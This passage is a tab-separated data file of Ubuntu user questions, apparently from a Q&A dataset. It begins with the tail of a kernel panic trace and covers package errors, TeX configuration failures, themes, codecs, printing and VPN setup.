225.906423 ] [ < ffffffff816c6db2 > ] rest_init+0x72/0x80 [ 225.906423 ] [ < ffffffff81d05c4f > ] start_kernel+0x3d1/0x3de [ 225.906423 ] [ < ffffffff81d057ff > ] ? pass_bootoption.constprop.2+0xd3/0xd3 [ 225.906423 ] [ < ffffffff81d05397 > ] x86_64_start_reservations+0x131/0x135 [ 225.906423 ] [ < ffffffff81d05120 > ] ? early_idt_handlers+0x120/0x120 [ 225.906423 ] [ < ffffffff81d05468 > ] x86_64_start_kernel+0xcd/0xdc [ 225.906423 ] code : 49 c1 e5 04 4c 03 6a 18 4c 89 ef e8 2f 35 0d 00 49 8b 84 24 60 03 00 [ 225.906423 ] rip [ < ffffffff8162056c > ] __inet_twsk_hashdance+0x8c/0x160 [ 225.906423 ] rsp < ffff88007fc039d0 > [ 225.906423 ] cr2 : 0000000000000020 [ 226.111238 ] -- - [ end trace 18ecfe1006daa681 ] -- - [ 226.111817 ] kernel panic - not syncing : fatal exception in interrupt
508155	how to move the header files and binaries in filesystem ?	i have downloaded imlib package in home folder and perform the make there only . now , my code where i am using # include `` imlib.h '' is not able to find it . so how can i move the header files and binaries in filesystem ?
508157	why does zukimac theme look bad ?	img : http : //pointybracket.net/images/zukitabs.png why do the outlines around tabs in this zukimac theme look so bad ? i used this theme in ubuntu 13.10 and it was fine , but since i 've updated to ubuntu 14.04 themes just break . this is one of them . i hope it 's a quick fix , or someone might be able to point me in the right direction . this issue does n't only occur when trying this theme in unity , it has also happened in cinnamon and those are the only two des i use really . some other themes , the titlebar is entirely black with the orange and white window controls , and look horrible . i am a web application developer , so if it 's likely a css issue then i can fix it , i just wonder if there 's an easier way ?
508162	error while installing skype	i am trying to install skype by typing this : sudo apt-get install skype reading package lists ... done this is what is happening ! ( reading database ... 231137 files and directories currently installed . ) unpacking skype ( from skype-ubuntu-lucid_4.2.0.11-1_i386.deb ) ... dpkg-deb ( subprocess ) : short read on buffer copy for failed to write to pipe in copy dpkg-deb : error : subprocess paste returned error exit status 2 dpkg : error processing skype-ubuntu-lucid_4.2.0.11-1_i386.deb ( -- install ) : short read on buffer copy for backend dpkg-deb during `./usr/bin/skype' processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for desktop-file-utils ... processing triggers for gnome-menus ... processing triggers for hicolor-icon-theme ... **errors were encountered while processing : ** skype-ubuntu-lucid_4.2.0.11-1_i386.deb '' what else can i do ?
508163	obapps ca n't `` find '' window	i push to find and see : < class 'xlib.protocol.request.queryextension ' > ( python:24700 ) : gtk-critical ** : ia__gtk_widget_get_direction : assertion 'gtk_is_widget ( widget ) ' failed < class 'xlib.protocol.request.queryextension ' > traceback ( most recent call last ) : file `` /usr/local/bin/obapps '' , line 125 , in onpicked info=obaxutils.get_window_info ( ( '_ob_app_name ' , '_ob_app_class ' , '_ob_app_role ' , '_ob_app_type ' , '_net_wm_name ' ) ) file `` /usr/local/lib/python2.7/dist-packages/obaxutils.py '' , line 95 , in get_window_info v=win.get_full_property ( ds.intern_atom ( prop ) , ds.intern_atom ( 'utf8_string ' ) ) .value attributeerror : 'nonetype ' object has no attribute 'value' and when start from terminal i see : < class 'xlib.protocol.request.queryextension ' > ( python:25005 ) : gtk-critical ** : ia__gtk_widget_get_direction : assertion 'gtk_is_widget ( widget ) ' failed or maybe we have another solution for starting some apps in full-screen ?
508167	how do i install media codecs ?	what is the easiest way to install all the media codec available for ubuntu ? i am having issues with multiple applications prompting me to install codecs before they can play my files .
508170	installing using virtual box	so i thought this would be easy ... . downloaded ubuntu 14.04.1 iso burned iso onto cd using roxio created a 20gb vm partition ( .vdi ) using virtualbox in virtualbox went into settings , system and moved cd to the top of my boot order in storage , under the `` controller ide '' section i selected my host cd drive d : \ here 's where it goes pear shaped , i assumed that i could then hit `` start '' and ubuntu would boot from the iso which is on my d : \ drive ... ... .wrong ! i get the following error - error relaunching virtualbox vm process : 5 command line :81954af5-4d2df-31eb-a142-b7af187a1c41-suplib-2ndchild -comment memtwo -- startvm e83b91d8-2147-4410-a8a1-67e264224054 -no-startvm-errormsgbox ' ( rc=104 ) sounds serious ! ! i 've read several instructions on how to do what i am doing and it all seems straightforward but i 'm clearly doing something wrong . please help ! !
508173	problem configuring texlive-base	i 've had some problems with apt-get updates since upgrading to 14.04 . it always ends up reporting errors configuring some packages . here 's the logs that appear relevant : $ sudo dpkg -- configure texlive-base setting up texlive-base ( 2013.20140215-1 ) ... mktexlsr : updating /var/lib/texmf/ls-r-texlivedist ... mktexlsr : updating /var/lib/texmf/ls-r-texmfmain ... mktexlsr : updating /var/lib/texmf/ls-r ... mktexlsr : done . /usr/bin/tl-paper : setting paper size for dvips to letter . /usr/bin/tl-paper : setting paper size for dvipdfmx to letter . /usr/bin/tl-paper : setting paper size for xdvi to letter . /usr/bin/tl-paper : setting paper size for pdftex to letter . running mktexlsr . this may take some time ... done . building format ( s ) -- all . this may take some time ... fmtutil-sys failed . output has been stored in /tmp/fmtutil.golunvjq please include this file if you report a bug . dpkg : error processing package texlive-base ( -- configure ) : subprocess installed post-installation script returned error exit status 1 processing triggers for menu ( 2.1.46ubuntu1 ) ... errors were encountered while processing : texlive-base $ sudo cat /tmp/fmtutil.golunvjq fmtutil : running `luatex -ini -jobname=dviluatex -progname=dviluatex dviluatex.ini ' ... this is luatex , version beta-0.76.0-2013121407 ( rev 4627 ) ( initex ) restricted \write18 enabled . ( /usr/share/texlive/texmf-dist/tex/plain/config/dviluatex.ini ( /usr/share/texlive/texmf-dist/tex/generic/config/luatexiniconfig.tex ) ( /usr/share/texlive/texmf-dist/tex/generic/config/luatex-unicode-letters.tex loading unicode properties ) ( /usr/share/texlive/texmf-dist/tex/plain/config/etex.ini ( /usr/share/texlive/texmf-dist/tex/luatex/hyph-utf8/etex.src ( /usr/share/texlive/texmf-dist/tex/plain/base/plain.tex preloading the plain format : codes , registers , parameters , fonts , ! font \tenrm=cmr10 not loadable : metric data not found or bad . < to be read again > \font l.401 \font \preloaded=cmr9 ? ! emergency stop . < to be read again > \font l.401 \font \preloaded=cmr9 no pages of output . transcript written on dviluatex.log . i 'm not sure what 's going on , although i did remove some fonts and languages that were taking up a lot of space . how can i fix these errors ? edit : here is the result of sudo apt-get install -f : reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 13 not fully installed or removed . after this operation , 0 b of additional disk space will be used . setting up tex-common ( 4.04 ) ... running mktexlsr . this may take some time ... done . running updmap-sys . this may take some time ... updmap-sys failed . output has been stored in /tmp/updmap.0oywwrgl please include this file if you report a bug . sometimes , not accepting conffile updates in /etc/texmf/updmap.d causes updmap-sys to fail . please check for files with extension .dpkg-dist or .ucf-dist in this directory dpkg : error processing package tex-common ( -- configure ) : subprocess installed post-installation script returned error exit status 1 dpkg : dependency problems prevent configuration of texlive-latex-base : texlive-latex-base depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . dpkg : error processing package texlive-latex-base ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of texlive-extra-utils : texlive-extra-utils depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . texlive-extra-utils depends on texlive-latex-base ( > = 2013.20130512 ) ; however : package texlive-latex-base is not configured yet . dpkg : error processing package texlive-extra-utils ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of texlive-latex-recommended : texlive-latex-recommended depends on texlive-latex-base ( > = 2013.20130512 ) ; however : package texlive-latex-base is not configured yet . texlive-latex-recommended depends on tex-common ( > = 3 ) ; however : package tex-common no apport report written because the error message indicates its a followup error from a previous failure . no apport report written because the error message indicates its a followup error from a previous failure . no apport report written because maxreports is reached already no apport report written because maxreports is reached already is not configured yet . dpkg : error processing package texlive-latex-recommended ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of texlive-latex-extra : texlive-latex-extra depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . texlive-latex-extra depends on texlive-latex-recommended ( > = 2013.20130512 ) ; however : package texlive-latex-recommended is not configured yet . dpkg : error processing package texlive-latex-extra ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of doxygen-latex : doxygen-latex depends on texlive-extra-utils ; however : package texlive-extra-utils is not configured yet . doxygen-latex depends on texlive-latex-extra ; however : package texlive-latex-extra is not configured yet . dpkg : error processing package doxygen-latex ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configurno apport report written because maxreports is reached already no apport report written because maxreports is reached already ation of feynmf : feynmf depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . feynmf depends on texlive-latex-base ; however : package texlive-latex-base is not configured yet . feynmf depends on texlive-extra-utils ; however : package texlive-extra-utils is not configured yet . dpkg : error processing package feynmf ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of mediawiki-math-texvc : mediawiki-math-texvc depends on texlive-latex-base ; however : package texlive-latex-base is not configured yet . mediawiki-math-texvc depends on texlive-latex-extra ; however : package texlive-latex-extra is not configured yet . dpkg : error processing package mediawiki-math-texvc ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of mediawiki-extensions-math : no apport report written because maxreports is reached already mediawiki-extensions-math depends on mediawiki-math-texvc ( > = 2:1.0 ) ; however : package mediawiki-math-texvc is not configured yet . dpkg : error processing package mediawiki-extensions-math ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of texlive : texlive depends on texlive-latex-recommended ( > = 2013.20130512 ) ; however : package texlive-latex-recommended is not configured yet . texlive depends on texlive-latex-base ( > = 2013.20130512 ) ; however : package texlive-latex-base is not configured yet . dpkg : error processing package texlive ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of texlive-pstricks : texlive-pstricks depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . dpkg : error processing package texlive-pstricks ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of texlive-xetex : texlive-xetex depends on texlive-latex-base ( > = 2013.20130512 ) ; however : package texlive-latex-base is not configured yet . texlive-xetex depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . dpkg : error processing package texlive-xetex ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of fragmaster : fragmaster depends on texlive-latex-base ; however : package texlive-latex-base is not configured yet . fragmaster depends on texlive-latex-recommended ; however : package texlive-latex-recommended is not configured yet . fragmaster depends on texlive-extra-utils ; however : package texlive-extra-utils is not configured yet . dpkg : error processing package fragmaster ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already errors were encountered while processing : tex-common texlive-latex-base texlive-extra-utils texlive-latex-recommended texlive-latex-extra doxygen-latex feynmf mediawiki-math-texvc mediawiki-extensions-math texlive texlive-pstricks texlive-xetex fragmaster e : sub-process /usr/bin/dpkg returned an error code ( 1 ) $ sudo cat /tmp/updmap.0oywwrgl updmap : resetting $ home value ( was /home/user ) to root 's actual home ( /root ) . updmap is using the following updmap.cfg files ( in precedence order ) : /usr/share/texmf/web2c/updmap.cfg /usr/share/texlive/texmf-dist/web2c/updmap.cfg updmap is using the following updmap.cfg file for writing changes : /etc/texmf/web2c/updmap.cfg dvips output dir : `` /var/lib/texmf/fonts/map/dvips/updmap '' pdftex output dir : `` /var/lib/texmf/fonts/map/pdftex/updmap '' dvipdfmx output dir : `` /var/lib/texmf/fonts/map/dvipdfmx/updmap '' error : the following map file ( s ) could n't be found : acorn.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) alegreya.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) annston.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) anonymouspro.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) arrowsadf.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) artnouv.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) artnouvc.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) bulletsadf.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) carrickc.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) countriesofeurope.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) ebgaramond.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) esstix.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) eichenla.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) eileen.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) eileenbl.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) elzevier.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) gotin.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) goudyin.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) kinigcap.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) konanur.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) kramer.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) librebaskerville.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) librecaslon.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) lobstertwo.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) mnsymbol.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) morrisin.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) nouveaud.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) ornementsadf.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) raleway.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) romantik.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) rothdn.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) royalin.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) sanremo.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) sourcecodepro.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) sourcesanspro.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) starburst.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) typocaps.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) xcharter.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) zallman.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) accanthis.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) allrunes.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) antt.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) ap.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) archaicprw.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) arev.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) arevvn.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) ascii.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) aspectratio.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) augie.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) auncial.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) aurical.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) bbold.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) belleek.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) bera.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) bguq.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) boondox.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) cabin.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) calligra.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) cantarell.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) ccicons.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) chartervn.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) cherokee.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) cjhebrew.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) clm.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) cm-lgc.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) cmbrightvn.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) cmin.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) cmll.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) comfortaa.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) concretevn.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) cyklop.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) dejavu-type1.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) dictsym.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) droid.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) dstroke.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) dutchcal.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) epigrafica.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) epiolmec.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) esint.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) esvect.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) eurosym.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) fbb.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) fdsymbol.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) fetamont.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) fge.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) foekfont.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) fonetika.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) fourier-utopia-expert.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) fourier.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) frcursive.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) gentium-type1.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) gfsartemisia.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) gfsbodoni.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) gfscomplutum.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) gfsdidot.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) gfsneohellenic.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) gfssolomos.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) gillius.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) gptimes.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) grotesqvn.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) hacm.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) hfbright.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) icelandic.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) ipaex-type1.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) iwona.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) knitfont.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) kpfonts.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) kurier.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) lato.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) libertine.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) lineara.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) lxfonts.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) manfnt.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) marvosym.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) mathabx.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) mdbch.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) mdgreek.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) mdici.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) mdpgd.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) mdpus.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) mdput.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) mdsymbol.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) mdugm.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) merriweather.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) mintspirit.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) nectec.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) newpx.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) newtx.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) nf.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) ocrb.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) oinuit.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) opensans.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) paratype-type1.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) pbsi.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) phaistos.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) pigpen.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) prodint.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) pxfonts.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) pxtx.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) quattrocento.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) recycle.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) rsfs.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) rsfso.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) sansmathaccent.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) sansmathfonts.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) semaf.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) sqrcaps.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) starfont.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) stix.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) superiors.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) syriac.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) tfrupee.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) tlwg.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) trajan.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) troff-updmap.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) txfonts.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) txttvn.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) uag.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) uaq.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) ubk.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) ucr.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) ugq.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) uhv.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) unc.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) upl.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) urwvn.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) usy.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) utm.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) uzc.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) uzd.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) vnrother.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) vnrtext.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) vntopia.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) wasy.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) xypic.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) ybd.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) ybv.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) yes.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) yfrak.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) yly.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) yrd.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) yv1.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) yv2.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) yv3.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) yvo.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) yvt.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) zi4.map ( in /usr/share/texlive/texmf-dist/web2c/updmap.cfg ) did you run mktexlsr ? you can disable non-existent map entries using the option -- syncwithtrees .
508175	confused about the security of ubuntu ( linux )	assume i have a laptop with ubuntu installed and two users abc and root . both users are password protected . it is possible to reset root password using live cd or usb using chroot which would mean that if someone stole my laptop or held it for sometime , he could reset my user password and get all my information . if it is possible then how secure is ubuntu and how secure are my files and information ? even bios firmware can be flashed in case i protect it with password .
508177	ubuntu weird printing issue ( big files )	i have been having this issue for a long period of time with different printers . always that i send something to print that has pictures and the size of the files are a round just a couple of megabytes the information that my printer receives is from a couple of hundreds of megabytes . so if i sent a picture of 2 megas , my printer try to print it areound 200 megas . that makes me having troubles with the speed of the printing , in general almost all the stuff that i sent to print are printed , but after an excesive use of resources . i do n't know if it is the software that i use to print ( i tried different ones anyway ) , or the printer driver . i have been using different pcl drivers without any luck . i am trying to move all my office computers to ubuntu , but this issue in particular is making it a little bit complicated . anyone had an issue like this before ?
508180	how do i change the shortcuts in mplayer ?	i want to change the shortcuts in mplayer . more specifically , i want when i press the right button to go to the next song in the playlist instead . how can i do that ?
508181	system settings wo n't start	when i run unity-control-center from the terminal , i get : libgl error : failed to load driver : swrast ( unity-control-center:21776 ) : gdk-error ** : the program 'unity-control-center ' received an x window system error . this probably reflects a bug in the program . the error was 'badlength ( poly request too large or internal xlib length erro ' . ( details : serial 227 error_code 16 request_code 155 ( glx ) minor_code 1 ) ( note to programmers : normally , x errors are reported asynchronously ; that is , you will receive the error a while after causing it . to debug your program , run it with the gdk_synchronize environment variable to change this behavior . you can then get a meaningful backtrace from your debugger if you break on the gdk_x_error ( ) function . ) trace/breakpoint trap ( core dumped ) i 'm running nvidia graphics drivers , if that helps : 01:00.0 vga compatible controller : nvidia corporation gk107m [ geforce gt 640m mac edition ] ( rev a1 )
508185	trying to unzip a locked folder	i recently downloaded a .zip archive , and i want to unzip it , so that i can run the application inside , but when i try to , it asks for a password . i am the root on my laptop , so i put in my own password , but it said that the password was wrong . also , that is the only password that exists on my laptop ( no other accounts ) . what should i do ?
508187	how to get rid of this error	the required plugins could not be found videos requires to install plugins to play files of the following types : • mpeg-1 layer 3 ( mp3 ) decoder • mpeg-4 video decoder i tried manually installing the same plugins , but it did n't do anything . can someone please help ?
508193	odd ubuntu graphical bug when viewing desktop	i 'm having this odd bug which wo n't fix itself it happens after entering my password and logging in - it 's like the desktop background is missing and so it just shows no pixels . i do n't know what could have caused it to happen , and i tried using compiz -- replace to fix it , but that has only worked once so far . anyone got a clue ?
508194	how can i batch replace one string at start of filename with string from end of filename ?	i am looking for a command that i can use with kubuntu 's terminal ( konsole ) . ( edit ) i figured out how to remove the useless last 13 characters in the filename , so what would the script be if i want to replace `` karaoke '' with the artist name in the filename is `` karaoke '' + space + `` song title '' + `` - `` + `` artist name '' + .mp4 ? is there a way to replace the word `` karaoke '' with `` artist name '' for all the files in a directory ? thanks in advance . here are the example filenames that oli requested : karaoke a spoonful of sugar - mary poppins karaoke ai n't no stoppin ' us now - mcfadden & whitehead karaoke ai n't nobody - chaka khan karaoke a tisket , a tasket - ella fitzgerald
508200	it is not possible to enable the wifi	i just intalled ubuntu in a mac computer with both systems . in the mac side , the wifi picks up correctly , but it does n't in the ubuntu side . for some reason it does n't show the enable option .
508203	ubuntu partition table	i 'm having a problem re-arranging my partition table . my partition table looks like the picture above , and i would like to extend my sda5 to use the space in the sda4 . i already tried to format the sda4 partition to ext4 , and tried to extend sda4 to use that space , but no use . first of all , is there any way to do this without losing my data ? if yes , please guide me how can i solve this problem .
508206	how to configure vpn in ubuntu ?	graphically illustrate me please , new to ubuntu
